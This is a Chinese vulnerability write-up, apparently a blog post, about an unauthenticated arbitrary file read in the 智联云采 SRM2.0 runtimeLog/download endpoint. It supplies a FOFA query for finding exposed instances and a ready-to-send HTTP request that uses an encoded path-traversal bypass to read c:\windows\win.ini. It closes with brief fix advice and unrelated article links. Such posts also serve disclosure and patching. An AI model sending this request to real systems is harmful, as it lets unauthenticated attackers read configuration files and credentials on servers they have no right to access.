智联云采 SRM2.0 runtimeLog/download 任意文件读取漏洞复现

0x01 产品简介

智联云采是一款针对企业供应链管理难题及智能化转型升级需求而设计的解决方案,针对企业供应链管理难题,及智能化转型升级需求,智联云采依托人工智能、物联网、大数据、云等技术,通过软硬件系统化方案,帮助企业实现供应商关系管理和采购线上化、移动化、智能化,提升采购和协同效率,进而规避供需风险,强化供应链整合能力,构建企业利益共同体。

0x02 漏洞概述

智联云采 SRM2.0 runtimeLog/download 接口存在任意文件读取漏洞,未经身份验证攻击者可通过该漏洞读取系统重要文件(如数据库配置文件、系统配置文件)、数据库配置文件等等,导致网站处于极度不安全状态。

0x03 复现环境

FOFA:title=="SRM 2.0"

0x04 漏洞复现

PoC

复制代码
GET /adpweb/static/%2e%2e;/a/sys/runtimeLog/download?path=c:\\windows\win.ini HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:129.0) Gecko/20100101 Firefox/129.0
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: keep-alive

0x05 修复建议

关闭互联网暴露面或接口设置访问权限

升级至安全版本

相关推荐
xinxinhenmeihao6 分钟前
使用长效代理是否存在安全风险?长效代理适合哪些应用场景?
服务器·网络·安全
yangshuo128115 分钟前
基于本地安全凭据库实现多账号一键切换
安全
运筹vivo@20 分钟前
攻防世界:get_post
web安全
瀚高PG实验室21 分钟前
使用安全版数据库开启ssl加密后jdbc写法
数据库·安全·ssl·瀚高数据库
江湖有缘23 分钟前
Docker一键部署 FileDrop:打造安全高效的私有文件共享服务
安全
林鸿风采24 分钟前
Alpine Linux 安装指南:轻量、安全、高效的系统部署实践
linux·运维·安全·alpine
深圳市恒星物联科技有限公司28 分钟前
湘深联动,共筑安全——恒星物联亮相深圳安全应急科技展览会
科技·安全
23zhgjx-hyh35 分钟前
【项目四:网络攻击分析】
网络·安全·web安全
小二·1 小时前
Python Web 开发进阶实战:API 安全与 JWT 认证 —— 构建企业级 RESTful 接口
前端·python·安全
Allen_LVyingbo1 小时前
具备安全护栏与版本化证据溯源的python可审计急诊分诊平台复现
开发语言·python·安全·搜索引擎·知识图谱·健康医疗